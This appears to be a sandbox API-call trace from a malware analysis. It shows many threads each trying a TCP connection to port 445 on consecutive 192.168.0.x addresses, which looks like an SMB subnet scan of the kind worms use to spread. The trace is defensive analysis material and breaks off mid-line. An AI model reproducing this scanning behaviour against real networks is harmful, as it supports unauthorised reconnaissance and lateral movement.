[0143.752] _errno () returned 0x28ffb50 [0143.752] wcslen (_String="192.168.0.112") returned 0xd [0143.752] wcstombs (in: _Dest=0x290a628, _Source="192.168.0.112", _MaxCount=0xe | out: _Dest="192.168.0.112") returned 0xd [0143.752] htons (hostshort=0x1bd) returned 0xbd01 [0143.752] inet_addr (cp="192.168.0.112") returned 0x7000a8c0 [0143.752] socket (af=2, type=1, protocol=0) returned 0xb00 [0143.752] connect (s=0xb00, name=0x126bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.112"), namelen=16) returned -1 [0164.941] GetCurrentThreadId () returned 0xa94 [0164.941] GetCurrentThreadId () returned 0xa94 [0164.941] longjmp () [0164.941] GetCurrentThreadId () returned 0xa94 [0164.941] CloseHandle (hObject=0xaf0) returned 1 [0164.941] GetCurrentThreadId () returned 0xa94 [0164.941] Sleep (dwMilliseconds=0x0) [0164.988] _endthreadex (_ReturnCode=0x0) Thread: id = 908 os_tid = 0xbfc [0143.754] GetCurrentThreadId () returned 0xbfc [0143.754] GetCurrentThreadId () returned 0xbfc [0143.754] GetCurrentThreadId () returned 0xbfc [0143.754] _errno () returned 0x28ff4d8 [0143.754] wcslen (_String="192.168.0.113") returned 0xd [0143.754] wcstombs (in: _Dest=0x2914678, _Source="192.168.0.113", _MaxCount=0xe | out: _Dest="192.168.0.113") returned 0xd [0143.754] htons (hostshort=0x1bd) returned 0xbd01 [0143.754] inet_addr (cp="192.168.0.113") returned 0x7100a8c0 [0143.754] socket (af=2, type=1, protocol=0) returned 0xb14 [0143.754] connect (s=0xb14, name=0x128ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.113"), namelen=16) returned -1 [0164.942] GetCurrentThreadId () returned 0xbfc [0164.942] GetCurrentThreadId () returned 0xbfc [0164.942] longjmp () [0164.942] GetCurrentThreadId () returned 0xbfc [0164.942] CloseHandle (hObject=0xb04) returned 1 [0164.942] GetCurrentThreadId () returned 0xbfc [0164.942] Sleep (dwMilliseconds=0x0) [0164.988] _endthreadex (_ReturnCode=0x0) Thread: id = 909 os_tid = 0xa84 [0143.757] GetCurrentThreadId () returned 0xa84 [0143.757] GetCurrentThreadId () returned 0xa84 [0143.757] GetCurrentThreadId () returned 0xa84 [0143.757] _errno () returned 0x28d6688 [0143.757] wcslen (_String="192.168.0.114") returned 0xd [0143.757] wcstombs (in: _Dest=0x2915680, _Source="192.168.0.114", _MaxCount=0xe | out: _Dest="192.168.0.114") returned 0xd [0143.757] htons (hostshort=0x1bd) returned 0xbd01 [0143.757] inet_addr (cp="192.168.0.114") returned 0x7200a8c0 [0143.757] socket (af=2, type=1, protocol=0) returned 0xb28 [0143.758] connect (s=0xb28, name=0x12b3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.114"), namelen=16) returned -1 [0164.942] GetCurrentThreadId () returned 0xa84 [0164.942] GetCurrentThreadId () returned 0xa84 [0164.942] longjmp () [0164.942] GetCurrentThreadId () returned 0xa84 [0164.942] CloseHandle (hObject=0xb18) returned 1 [0164.942] GetCurrentThreadId () returned 0xa84 [0164.942] Sleep (dwMilliseconds=0x0) [0164.989] _endthreadex (_ReturnCode=0x0) Thread: id = 910 os_tid = 0x824 [0143.760] GetCurrentThreadId () returned 0x824 [0143.760] GetCurrentThreadId () returned 0x824 [0143.760] GetCurrentThreadId () returned 0x824 [0143.760] _errno () returned 0x2926d30 [0143.760] wcslen (_String="192.168.0.115") returned 0xd [0143.760] wcstombs (in: _Dest=0x2917690, _Source="192.168.0.115", _MaxCount=0xe | out: _Dest="192.168.0.115") returned 0xd [0143.760] htons (hostshort=0x1bd) returned 0xbd01 [0143.760] inet_addr (cp="192.168.0.115") returned 0x7300a8c0 [0143.760] socket (af=2, type=1, protocol=0) returned 0xb3c [0143.760] connect (s=0xb3c, name=0x12d7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.115"), namelen=16) returned -1 [0164.942] GetCurrentThreadId () returned 0x824 [0164.942] GetCurrentThreadId () returned 0x824 [0164.942] longjmp () [0164.942] GetCurrentThreadId () returned 0x824 [0164.942] CloseHandle (hObject=0xb2c) returned 1 [0164.942] GetCurrentThreadId () returned 0x824 [0164.942] Sleep (dwMilliseconds=0x0) [0164.990] _endthreadex (_ReturnCode=0x0) Thread: id = 911 os_tid = 0xa88 [0143.762] GetCurrentThreadId () returned 0xa88 [0143.762] GetCurrentThreadId () returned 0xa88 [0143.762] GetCurrentThreadId () returned 0xa88 [0143.762] _errno () returned 0x2924660 [0143.762] wcslen (_String="192.168.0.116") returned 0xd [0143.762] wcstombs (in: _Dest=0x2913670, _Source="192.168.0.116", _MaxCount=0xe | out: _Dest="192.168.0.116") returned 0xd [0143.762] htons (hostshort=0x1bd) returned 0xbd01 [0143.762] inet_addr (cp="192.168.0.116") returned 0x7400a8c0 [0143.762] socket (af=2, type=1, protocol=0) returned 0xb50 [0143.762] connect (s=0xb50, name=0x12fbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.116"), namelen=16) returned -1 [0164.942] GetCurrentThreadId () returned 0xa88 [0164.942] GetCurrentThreadId () returned 0xa88 [0164.942] longjmp () [0164.942] GetCurrentThreadId () returned 0xa88 [0164.942] CloseHandle (hObject=0xb40) returned 1 [0164.942] GetCurrentThreadId () returned 0xa88 [0164.942] Sleep (dwMilliseconds=0x0) [0164.990] _endthreadex (_ReturnCode=0x0) Thread: id = 912 os_tid = 0xf64 [0143.764] GetCurrentThreadId () returned 0xf64 [0143.764] GetCurrentThreadId () returned 0xf64 [0143.764] GetCurrentThreadId () returned 0xf64 [0143.764] _errno () returned 0x2924888 [0143.764] wcslen (_String="192.168.0.117") returned 0xd [0143.764] wcstombs (in: _Dest=0x29196a0, _Source="192.168.0.117", _MaxCount=0xe | out: _Dest="192.168.0.117") returned 0xd [0143.764] htons (hostshort=0x1bd) returned 0xbd01 [0143.764] inet_addr (cp="192.168.0.117") returned 0x7500a8c0 [0143.764] socket (af=2, type=1, protocol=0) returned 0xb64 [0143.765] connect (s=0xb64, name=0x131ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.117"), namelen=16) returned -1 [0164.942] GetCurrentThreadId () returned 0xf64 [0164.943] GetCurrentThreadId () returned 0xf64 [0164.943] longjmp () [0164.943] GetCurrentThreadId () returned 0xf64 [0164.943] CloseHandle (hObject=0xb54) returned 1 [0164.943] GetCurrentThreadId () returned 0xf64 [0164.943] Sleep (dwMilliseconds=0x0) [0164.991] _endthreadex (_ReturnCode=0x0) Thread: id = 913 os_tid = 0xa90 [0143.766] GetCurrentThreadId () returned 0xa90 [0143.766] GetCurrentThreadId () returned 0xa90 [0143.766] GetCurrentThreadId () returned 0xa90 [0143.766] _errno () returned 0x2924ab0 [0143.766] wcslen (_String="192.168.0.118") returned 0xd [0143.766] wcstombs (in: _Dest=0x2916688, _Source="192.168.0.118", _MaxCount=0xe | out: _Dest="192.168.0.118") returned 0xd [0143.766] htons (hostshort=0x1bd) returned 0xbd01 [0143.766] inet_addr (cp="192.168.0.118") returned 0x7600a8c0 [0143.766] socket (af=2, type=1, protocol=0) returned 0xb78 [0143.767] connect (s=0xb78, name=0x1343fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.118"), namelen=16) returned -1 [0164.943] GetCurrentThreadId () returned 0xa90 [0164.943] GetCurrentThreadId () returned 0xa90 [0164.943] longjmp () [0164.943] GetCurrentThreadId () returned 0xa90 [0164.943] CloseHandle (hObject=0xb68) returned 1 [0164.943] GetCurrentThreadId () returned 0xa90 [0164.943] Sleep (dwMilliseconds=0x0) [0164.991] _endthreadex (_ReturnCode=0x0) Thread: id = 914 os_tid = 0xf5c [0143.768] GetCurrentThreadId () returned 0xf5c [0143.769] GetCurrentThreadId () returned 0xf5c [0143.769] GetCurrentThreadId () returned 0xf5c [0143.769] _errno () returned 0x2924cd8 [0143.769] wcslen (_String="192.168.0.119") returned 0xd [0143.769] wcstombs (in: _Dest=0x2918698, _Source="192.168.0.119", _MaxCount=0xe | out: _Dest="192.168.0.119") returned 0xd [0143.769] htons (hostshort=0x1bd) returned 0xbd01 [0143.769] inet_addr (cp="192.168.0.119") returned 0x7700a8c0 [0143.769] socket (af=2, type=1, protocol=0) returned 0xb8c [0143.769] connect (s=0xb8c, name=0x1367fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.119"), namelen=16) returned -1 [0164.943] GetCurrentThreadId () returned 0xf5c [0164.943] GetCurrentThreadId () returned 0xf5c [0164.943] longjmp () [0164.943] GetCurrentThreadId () returned 0xf5c [0164.943] CloseHandle (hObject=0xb7c) returned 1 [0164.943] GetCurrentThreadId () returned 0xf5c [0164.943] Sleep (dwMilliseconds=0x0) [0164.992] _endthreadex (_ReturnCode=0x0) Thread: id = 915 os_tid = 0xf94 [0143.770] GetCurrentThreadId () returned 0xf94 [0143.770] GetCurrentThreadId () returned 0xf94 [0143.770] GetCurrentThreadId () returned 0xf94 [0143.770] _errno () returned 0x2924f00 [0143.770] wcslen (_String="192.168.0.120") returned 0xd [0143.770] wcstombs (in: _Dest=0x2912668, _Source="192.168.0.120", _MaxCount=0xe | out: _Dest="192.168.0.120") returned 0xd [0143.770] htons (hostshort=0x1bd) returned 0xbd01 [0143.770] inet_addr (cp="192.168.0.120") returned 0x7800a8c0 [0143.771] socket (af=2, type=1, protocol=0) returned 0xba0 [0143.771] connect (s=0xba0, name=0x138bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.120"), namelen=16) returned -1 [0164.943] GetCurrentThreadId () returned 0xf94 [0164.943] GetCurrentThreadId () returned 0xf94 [0164.943] longjmp () [0164.943] GetCurrentThreadId () returned 0xf94 [0164.943] CloseHandle (hObject=0xb90) returned 1 [0164.943] GetCurrentThreadId () returned 0xf94 [0164.943] Sleep (dwMilliseconds=0x0) [0164.993] _endthreadex (_ReturnCode=0x0) Thread: id = 916 os_tid = 0xfa8 [0143.772] GetCurrentThreadId () returned 0xfa8 [0143.772] GetCurrentThreadId () returned 0xfa8 [0143.772] GetCurrentThreadId () returned 0xfa8 [0143.772] _errno () returned 0x2925128 [0143.772] wcslen (_String="192.168.0.121") returned 0xd [0143.772] wcstombs (in: _Dest=0x291f6d0, _Source="192.168.0.121", _MaxCount=0xe | out: _Dest="192.168.0.121") returned 0xd [0143.772] htons (hostshort=0x1bd) returned 0xbd01 [0143.772] inet_addr (cp="192.168.0.121") returned 0x7900a8c0 [0143.772] socket (af=2, type=1, protocol=0) returned 0xbb4 [0143.772] connect (s=0xbb4, name=0x13affe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.121"), namelen=16) returned -1 [0164.944] GetCurrentThreadId () returned 0xfa8 [0164.944] GetCurrentThreadId () returned 0xfa8 [0164.944] longjmp () [0164.944] GetCurrentThreadId () returned 0xfa8 [0164.944] CloseHandle (hObject=0xba4) returned 1 [0164.944] GetCurrentThreadId () returned 0xfa8 [0164.944] Sleep (dwMilliseconds=0x0) [0164.993] _endthreadex (_ReturnCode=0x0) Thread: id = 917 os_tid = 0xf6c [0143.773] GetCurrentThreadId () returned 0xf6c [0143.773] GetCurrentThreadId () returned 0xf6c [0143.773] GetCurrentThreadId () returned 0xf6c [0143.773] _errno () returned 0x2925350 [0143.773] wcslen (_String="192.168.0.122") returned 0xd [0143.773] wcstombs (in: _Dest=0x291b6b0, _Source="192.168.0.122", _MaxCount=0xe | out: _Dest="192.168.0.122") returned 0xd [0143.773] htons (hostshort=0x1bd) returned 0xbd01 [0143.773] inet_addr (cp="192.168.0.122") returned 0x7a00a8c0 [0143.773] socket (af=2, type=1, protocol=0) returned 0xbc8 [0143.774] connect (s=0xbc8, name=0x13d3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.122"), namelen=16) returned -1 [0164.944] GetCurrentThreadId () returned 0xf6c [0164.944] GetCurrentThreadId () returned 0xf6c [0164.944] longjmp () [0164.944] GetCurrentThreadId () returned 0xf6c [0164.944] CloseHandle (hObject=0xbb8) returned 1 [0164.944] GetCurrentThreadId () returned 0xf6c [0164.944] Sleep (dwMilliseconds=0x0) [0164.994] _endthreadex (_ReturnCode=0x0) Thread: id = 918 os_tid = 0xfb4 [0143.775] GetCurrentThreadId () returned 0xfb4 [0143.775] GetCurrentThreadId () returned 0xfb4 [0143.775] GetCurrentThreadId () returned 0xfb4 [0143.775] _errno () returned 0x2927a20 [0143.775] wcslen (_String="192.168.0.123") returned 0xd [0143.775] wcstombs (in: _Dest=0x291a6a8, _Source="192.168.0.123", _MaxCount=0xe | out: _Dest="192.168.0.123") returned 0xd [0143.775] htons (hostshort=0x1bd) returned 0xbd01 [0143.775] inet_addr (cp="192.168.0.123") returned 0x7b00a8c0 [0143.775] socket (af=2, type=1, protocol=0) returned 0xbdc [0143.775] connect (s=0xbdc, name=0x13f7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.123"), namelen=16) returned -1 [0164.944] GetCurrentThreadId () returned 0xfb4 [0164.944] GetCurrentThreadId () returned 0xfb4 [0164.944] longjmp () [0164.944] GetCurrentThreadId () returned 0xfb4 [0164.944] CloseHandle (hObject=0xbcc) returned 1 [0164.944] GetCurrentThreadId () returned 0xfb4 [0164.944] Sleep (dwMilliseconds=0x0) [0164.994] _endthreadex (_ReturnCode=0x0) Thread: id = 919 os_tid = 0xfb0 [0143.777] GetCurrentThreadId () returned 0xfb0 [0143.777] GetCurrentThreadId () returned 0xfb0 [0143.777] GetCurrentThreadId () returned 0xfb0 [0143.777] _errno () returned 0x2927c48 [0143.777] wcslen (_String="192.168.0.124") returned 0xd [0143.777] wcstombs (in: _Dest=0x291c6b8, _Source="192.168.0.124", _MaxCount=0xe | out: _Dest="192.168.0.124") returned 0xd [0143.777] htons (hostshort=0x1bd) returned 0xbd01 [0143.777] inet_addr (cp="192.168.0.124") returned 0x7c00a8c0 [0143.777] socket (af=2, type=1, protocol=0) returned 0xbf0 [0143.777] connect (s=0xbf0, name=0x141bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.124"), namelen=16) returned -1 [0164.944] GetCurrentThreadId () returned 0xfb0 [0164.944] GetCurrentThreadId () returned 0xfb0 [0164.944] longjmp () [0164.944] GetCurrentThreadId () returned 0xfb0 [0164.944] CloseHandle (hObject=0xbe0) returned 1 [0164.944] GetCurrentThreadId () returned 0xfb0 [0164.944] Sleep (dwMilliseconds=0x0) [0164.995] _endthreadex (_ReturnCode=0x0) Thread: id = 920 os_tid = 0xf54 [0143.778] GetCurrentThreadId () returned 0xf54 [0143.778] GetCurrentThreadId () returned 0xf54 [0143.778] GetCurrentThreadId () returned 0xf54 [0143.778] _errno () returned 0x29277f8 [0143.779] wcslen (_String="192.168.0.125") returned 0xd [0143.779] wcstombs (in: _Dest=0x291d6c0, _Source="192.168.0.125", _MaxCount=0xe | out: _Dest="192.168.0.125") returned 0xd [0143.779] htons (hostshort=0x1bd) returned 0xbd01 [0143.779] inet_addr (cp="192.168.0.125") returned 0x7d00a8c0 [0143.779] socket (af=2, type=1, protocol=0) returned 0xc08 [0143.779] connect (s=0xc08, name=0x143ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.125"), namelen=16) returned -1 [0164.944] GetCurrentThreadId () returned 0xf54 [0164.944] GetCurrentThreadId () returned 0xf54 [0164.944] longjmp () [0164.945] GetCurrentThreadId () returned 0xf54 [0164.945] CloseHandle (hObject=0xbf4) returned 1 [0164.945] GetCurrentThreadId () returned 0xf54 [0164.945] Sleep (dwMilliseconds=0x0) [0164.995] _endthreadex (_ReturnCode=0x0) Thread: id = 921 os_tid = 0xf78 [0143.780] GetCurrentThreadId () returned 0xf78 [0143.780] GetCurrentThreadId () returned 0xf78 [0143.780] GetCurrentThreadId () returned 0xf78 [0143.780] _errno () returned 0x2927e70 [0143.780] wcslen (_String="192.168.0.126") returned 0xd [0143.780] wcstombs (in: _Dest=0x291e6c8, _Source="192.168.0.126", _MaxCount=0xe | out: _Dest="192.168.0.126") returned 0xd [0143.780] htons (hostshort=0x1bd) returned 0xbd01 [0143.780] inet_addr (cp="192.168.0.126") returned 0x7e00a8c0 [0143.780] socket (af=2, type=1, protocol=0) returned 0xc1c [0143.780] connect (s=0xc1c, name=0x1463fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.126"), namelen=16) returned -1 [0164.945] GetCurrentThreadId () returned 0xf78 [0164.945] GetCurrentThreadId () returned 0xf78 [0164.945] longjmp () [0164.945] GetCurrentThreadId () returned 0xf78 [0164.945] CloseHandle (hObject=0xc0c) returned 1 [0164.945] GetCurrentThreadId () returned 0xf78 [0164.945] Sleep (dwMilliseconds=0x0) [0164.996] _endthreadex (_ReturnCode=0x0) Thread: id = 922 os_tid = 0xfb8 [0143.782] GetCurrentThreadId () returned 0xfb8 [0143.782] GetCurrentThreadId () returned 0xfb8 [0143.782] GetCurrentThreadId () returned 0xfb8 [0143.782] _errno () returned 0x2924210 [0143.783] wcslen (_String="192.168.0.127") returned 0xd [0143.783] wcstombs (in: _Dest=0x292b6b0, _Source="192.168.0.127", _MaxCount=0xe | out: _Dest="192.168.0.127") returned 0xd [0143.783] htons (hostshort=0x1bd) returned 0xbd01 [0143.783] inet_addr (cp="192.168.0.127") returned 0x7f00a8c0 [0143.784] socket (af=2, type=1, protocol=0) returned 0xc30 [0143.784] connect (s=0xc30, name=0x1487fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.127"), namelen=16) returned -1 [0164.945] GetCurrentThreadId () returned 0xfb8 [0164.945] GetCurrentThreadId () returned 0xfb8 [0164.945] longjmp () [0164.945] GetCurrentThreadId () returned 0xfb8 [0164.945] CloseHandle (hObject=0xc20) returned 1 [0164.945] GetCurrentThreadId () returned 0xfb8 [0164.945] Sleep (dwMilliseconds=0x0) [0164.996] _endthreadex (_ReturnCode=0x0) Thread: id = 923 os_tid = 0xf68 [0143.785] GetCurrentThreadId () returned 0xf68 [0143.785] GetCurrentThreadId () returned 0xf68 [0143.785] GetCurrentThreadId () returned 0xf68 [0143.785] _errno () returned 0x2925578 [0143.785] wcslen (_String="192.168.0.128") returned 0xd [0143.785] wcstombs (in: _Dest=0x2928698, _Source="192.168.0.128", _MaxCount=0xe | out: _Dest="192.168.0.128") returned 0xd [0143.785] htons (hostshort=0x1bd) returned 0xbd01 [0143.785] inet_addr (cp="192.168.0.128") returned 0x8000a8c0 [0143.785] socket (af=2, type=1, protocol=0) returned 0xc44 [0143.785] connect (s=0xc44, name=0x14abfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.128"), namelen=16) returned -1 [0164.945] GetCurrentThreadId () returned 0xf68 [0164.945] GetCurrentThreadId () returned 0xf68 [0164.945] longjmp () [0164.945] GetCurrentThreadId () returned 0xf68 [0164.945] CloseHandle (hObject=0xc34) returned 1 [0164.945] GetCurrentThreadId () returned 0xf68 [0164.945] Sleep (dwMilliseconds=0x0) [0164.997] _endthreadex (_ReturnCode=0x0) Thread: id = 924 os_tid = 0xf74 [0143.786] GetCurrentThreadId () returned 0xf74 [0143.786] GetCurrentThreadId () returned 0xf74 [0143.786] GetCurrentThreadId () returned 0xf74 [0143.786] _errno () returned 0x2924438 [0143.787] wcslen (_String="192.168.0.129") returned 0xd [0143.787] wcstombs (in: _Dest=0x29296a0, _Source="192.168.0.129", _MaxCount=0xe | out: _Dest="192.168.0.129") returned 0xd [0143.787] htons (hostshort=0x1bd) returned 0xbd01 [0143.787] inet_addr (cp="192.168.0.129") returned 0x8100a8c0 [0143.787] socket (af=2, type=1, protocol=0) returned 0xc58 [0143.787] connect (s=0xc58, name=0x14cffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.129"), namelen=16) returned -1 [0164.945] GetCurrentThreadId () returned 0xf74 [0164.945] GetCurrentThreadId () returned 0xf74 [0164.945] longjmp () [0164.945] GetCurrentThreadId () returned 0xf74 [0164.945] CloseHandle (hObject=0xc48) returned 1 [0164.945] GetCurrentThreadId () returned 0xf74 [0164.945] Sleep (dwMilliseconds=0x0) [0164.998] _endthreadex (_ReturnCode=0x0) Thread: id = 925 os_tid = 0xfc8 [0143.788] GetCurrentThreadId () returned 0xfc8 [0143.788] GetCurrentThreadId () returned 0xfc8 [0143.788] GetCurrentThreadId () returned 0xfc8 [0143.788] _errno () returned 0x29259c8 [0143.788] wcslen (_String="192.168.0.130") returned 0xd [0143.788] wcstombs (in: _Dest=0x292a6a8, _Source="192.168.0.130", _MaxCount=0xe | out: _Dest="192.168.0.130") returned 0xd [0143.788] htons (hostshort=0x1bd) returned 0xbd01 [0143.788] inet_addr (cp="192.168.0.130") returned 0x8200a8c0 [0143.788] socket (af=2, type=1, protocol=0) returned 0xc6c [0143.788] connect (s=0xc6c, name=0x14f3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.130"), namelen=16) returned -1 [0164.946] GetCurrentThreadId () returned 0xfc8 [0164.946] GetCurrentThreadId () returned 0xfc8 [0164.946] longjmp () [0164.946] GetCurrentThreadId () returned 0xfc8 [0164.946] CloseHandle (hObject=0xc5c) returned 1 [0164.946] GetCurrentThreadId () returned 0xfc8 [0164.946] Sleep (dwMilliseconds=0x0) [0164.998] _endthreadex (_ReturnCode=0x0) Thread: id = 926 os_tid = 0x960 [0143.790] GetCurrentThreadId () returned 0x960 [0143.790] GetCurrentThreadId () returned 0x960 [0143.790] GetCurrentThreadId () returned 0x960 [0143.790] _errno () returned 0x29257a0 [0143.790] wcslen (_String="192.168.0.131") returned 0xd [0143.790] wcstombs (in: _Dest=0x292c6b8, _Source="192.168.0.131", _MaxCount=0xe | out: _Dest="192.168.0.131") returned 0xd [0143.790] htons (hostshort=0x1bd) returned 0xbd01 [0143.790] inet_addr (cp="192.168.0.131") returned 0x8300a8c0 [0143.790] socket (af=2, type=1, protocol=0) returned 0xc80 [0143.790] connect (s=0xc80, name=0x1517fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.131"), namelen=16) returned -1 [0164.946] GetCurrentThreadId () returned 0x960 [0164.946] GetCurrentThreadId () returned 0x960 [0164.946] longjmp () [0164.946] GetCurrentThreadId () returned 0x960 [0164.946] CloseHandle (hObject=0xc70) returned 1 [0164.946] GetCurrentThreadId () returned 0x960 [0164.946] Sleep (dwMilliseconds=0x0) [0164.999] _endthreadex (_ReturnCode=0x0) Thread: id = 927 os_tid = 0xb68 [0143.792] GetCurrentThreadId () returned 0xb68 [0143.792] GetCurrentThreadId () returned 0xb68 [0143.792] GetCurrentThreadId () returned 0xb68 [0143.792] _errno () returned 0x2925e18 [0143.792] wcslen (_String="192.168.0.132") returned 0xd [0143.792] wcstombs (in: _Dest=0x292d6c0, _Source="192.168.0.132", _MaxCount=0xe | out: _Dest="192.168.0.132") returned 0xd [0143.792] htons (hostshort=0x1bd) returned 0xbd01 [0143.792] inet_addr (cp="192.168.0.132") returned 0x8400a8c0 [0143.792] socket (af=2, type=1, protocol=0) returned 0xc94 [0143.792] connect (s=0xc94, name=0x153bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.132"), namelen=16) returned -1 [0164.946] GetCurrentThreadId () returned 0xb68 [0164.946] GetCurrentThreadId () returned 0xb68 [0164.946] longjmp () [0164.946] GetCurrentThreadId () returned 0xb68 [0164.946] CloseHandle (hObject=0xc84) returned 1 [0164.946] GetCurrentThreadId () returned 0xb68 [0164.946] Sleep (dwMilliseconds=0x0) [0164.999] _endthreadex (_ReturnCode=0x0) Thread: id = 928 os_tid = 0xfcc [0143.793] GetCurrentThreadId () returned 0xfcc [0143.794] GetCurrentThreadId () returned 0xfcc [0143.794] GetCurrentThreadId () returned 0xfcc [0143.794] _errno () returned 0x2925bf0 [0143.794] wcslen (_String="192.168.0.133") returned 0xd [0143.794] wcstombs (in: _Dest=0x292e6c8, _Source="192.168.0.133", _MaxCount=0xe | out: _Dest="192.168.0.133") returned 0xd [0143.794] htons (hostshort=0x1bd) returned 0xbd01 [0143.794] inet_addr (cp="192.168.0.133") returned 0x8500a8c0 [0143.794] socket (af=2, type=1, protocol=0) returned 0xca8 [0143.794] connect (s=0xca8, name=0x155ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.133"), namelen=16) returned -1 [0164.946] GetCurrentThreadId () returned 0xfcc [0164.946] GetCurrentThreadId () returned 0xfcc [0164.946] longjmp () [0164.946] GetCurrentThreadId () returned 0xfcc [0164.946] CloseHandle (hObject=0xc98) returned 1 [0164.946] GetCurrentThreadId () returned 0xfcc [0164.946] Sleep (dwMilliseconds=0x0) [0165.000] _endthreadex (_ReturnCode=0x0) Thread: id = 929 os_tid = 0xffc [0143.795] GetCurrentThreadId () returned 0xffc [0143.795] GetCurrentThreadId () returned 0xffc [0143.795] GetCurrentThreadId () returned 0xffc [0143.795] _errno () returned 0x2926268 [0143.796] wcslen (_String="192.168.0.134") returned 0xd [0143.796] wcstombs (in: _Dest=0x29316e0, _Source="192.168.0.134", _MaxCount=0xe | out: _Dest="192.168.0.134") returned 0xd [0143.796] htons (hostshort=0x1bd) returned 0xbd01 [0143.796] inet_addr (cp="192.168.0.134") returned 0x8600a8c0 [0143.796] socket (af=2, type=1, protocol=0) returned 0xcbc [0143.796] connect (s=0xcbc, name=0x1583fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.134"), namelen=16) returned -1 [0164.946] GetCurrentThreadId () returned 0xffc [0164.946] GetCurrentThreadId () returned 0xffc [0164.947] longjmp () [0164.947] GetCurrentThreadId () returned 0xffc [0164.947] CloseHandle (hObject=0xcac) returned 1 [0164.947] GetCurrentThreadId () returned 0xffc [0164.947] Sleep (dwMilliseconds=0x0) [0165.001] _endthreadex (_ReturnCode=0x0) Thread: id = 930 os_tid = 0xf8c [0143.797] GetCurrentThreadId () returned 0xf8c [0143.797] GetCurrentThreadId () returned 0xf8c [0143.797] GetCurrentThreadId () returned 0xf8c [0143.797] _errno () returned 0x2926490 [0143.797] wcslen (_String="192.168.0.135") returned 0xd [0143.797] wcstombs (in: _Dest=0x292f6d0, _Source="192.168.0.135", _MaxCount=0xe | out: _Dest="192.168.0.135") returned 0xd [0143.797] htons (hostshort=0x1bd) returned 0xbd01 [0143.797] inet_addr (cp="192.168.0.135") returned 0x8700a8c0 [0143.797] socket (af=2, type=1, protocol=0) returned 0xcd0 [0143.798] connect (s=0xcd0, name=0x15a7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.135"), namelen=16) returned -1 [0164.947] GetCurrentThreadId () returned 0xf8c [0164.947] GetCurrentThreadId () returned 0xf8c [0164.947] longjmp () [0164.947] GetCurrentThreadId () returned 0xf8c [0164.947] CloseHandle (hObject=0xcc0) returned 1 [0164.947] GetCurrentThreadId () returned 0xf8c [0164.947] Sleep (dwMilliseconds=0x0) [0165.001] _endthreadex (_ReturnCode=0x0) Thread: id = 931 os_tid = 0xfd0 [0143.799] GetCurrentThreadId () returned 0xfd0 [0143.799] GetCurrentThreadId () returned 0xfd0 [0143.799] GetCurrentThreadId () returned 0xfd0 [0143.799] _errno () returned 0x29273a8 [0143.800] wcslen (_String="192.168.0.136") returned 0xd [0143.800] wcstombs (in: _Dest=0x29306d8, _Source="192.168.0.136", _MaxCount=0xe | out: _Dest="192.168.0.136") returned 0xd [0143.800] htons (hostshort=0x1bd) returned 0xbd01 [0143.800] inet_addr (cp="192.168.0.136") returned 0x8800a8c0 [0143.800] socket (af=2, type=1, protocol=0) returned 0xce4 [0143.800] connect (s=0xce4, name=0x15cbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.136"), namelen=16) returned -1 [0164.947] GetCurrentThreadId () returned 0xfd0 [0164.947] GetCurrentThreadId () returned 0xfd0 [0164.947] longjmp () [0164.947] GetCurrentThreadId () returned 0xfd0 [0164.947] CloseHandle (hObject=0xcd4) returned 1 [0164.947] GetCurrentThreadId () returned 0xfd0 [0164.947] Sleep (dwMilliseconds=0x0) [0165.002] _endthreadex (_ReturnCode=0x0) Thread: id = 932 os_tid = 0xf88 [0143.802] GetCurrentThreadId () returned 0xf88 [0143.802] GetCurrentThreadId () returned 0xf88 [0143.802] GetCurrentThreadId () returned 0xf88 [0143.802] _errno () returned 0x2926040 [0143.802] wcslen (_String="192.168.0.137") returned 0xd [0143.802] wcstombs (in: _Dest=0x29336f0, _Source="192.168.0.137", _MaxCount=0xe | out: _Dest="192.168.0.137") returned 0xd [0143.802] htons (hostshort=0x1bd) returned 0xbd01 [0143.802] inet_addr (cp="192.168.0.137") returned 0x8900a8c0 [0143.802] socket (af=2, type=1, protocol=0) returned 0xcf8 [0143.802] connect (s=0xcf8, name=0x15effe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.137"), namelen=16) returned -1 [0164.947] GetCurrentThreadId () returned 0xf88 [0164.947] GetCurrentThreadId () returned 0xf88 [0164.947] longjmp () [0164.947] GetCurrentThreadId () returned 0xf88 [0164.947] CloseHandle (hObject=0xce8) returned 1 [0164.947] GetCurrentThreadId () returned 0xf88 [0164.947] Sleep (dwMilliseconds=0x0) [0165.002] _endthreadex (_ReturnCode=0x0) Thread: id = 933 os_tid = 0xf9c [0143.804] GetCurrentThreadId () returned 0xf9c [0143.804] GetCurrentThreadId () returned 0xf9c [0143.804] GetCurrentThreadId () returned 0xf9c [0143.804] _errno () returned 0x29268e0 [0143.804] wcslen (_String="192.168.0.138") returned 0xd [0143.804] wcstombs (in: _Dest=0x29346f8, _Source="192.168.0.138", _MaxCount=0xe | out: _Dest="192.168.0.138") returned 0xd [0143.804] htons (hostshort=0x1bd) returned 0xbd01 [0143.804] inet_addr (cp="192.168.0.138") returned 0x8a00a8c0 [0143.804] socket (af=2, type=1, protocol=0) returned 0xd0c [0143.804] 